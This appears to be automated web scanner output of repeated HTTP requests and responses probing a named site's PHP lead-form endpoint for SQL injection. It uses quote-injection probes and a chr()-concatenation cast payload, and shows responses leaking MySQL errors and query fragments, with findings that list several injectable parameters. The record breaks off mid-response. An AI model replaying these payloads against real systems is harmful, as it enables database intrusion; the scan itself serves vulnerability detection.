GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=fm399kce0267llhvh00snkpsk7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2976__Internet access&attributeId_459=2985__Yes - DSL&attributeId_460=2990__1' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ulf1unfkjbicmki6nee62ivm57; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:42 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=p2083j7aaeq8mt43bckf0166f7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2976__Internet access&attributeId_459=2985__Yes - DSL&attributeId_460=2990__1' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:42 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ce89v69m4neljpc20mitvipdn7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_458%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_458%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access'&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=if3pmfjl69rqniq6sf8quuk3r7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access''&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=tiev52psrlgblojuh97dveern4; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32577
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_459 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_459 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL'&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:18:34 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8jueoaj7n4uqk5bl6oce9hkld1; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL''&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:18:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=567ch9h3v4hl89ecukulriro85; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_460 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_460 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1'&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:18:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=3ij77fofpm230f693hjm89cj87; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1''&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:18:43 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=oeq6u99ffar0uvr66edtfl70r6; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_461 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_461 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP'&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:18:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qrjovqidd2vv3qhm1iqotvjk34; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'per month (price for Upgraded Business DSL)&attributeId_516=3357__ Unsure - plea' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP''&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:18:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=do78e0hmv99ob5ml2roejg39a7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_462_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_462_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3'&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:19:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=0tbvsra0pim6ku1mrstf8q46c3; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
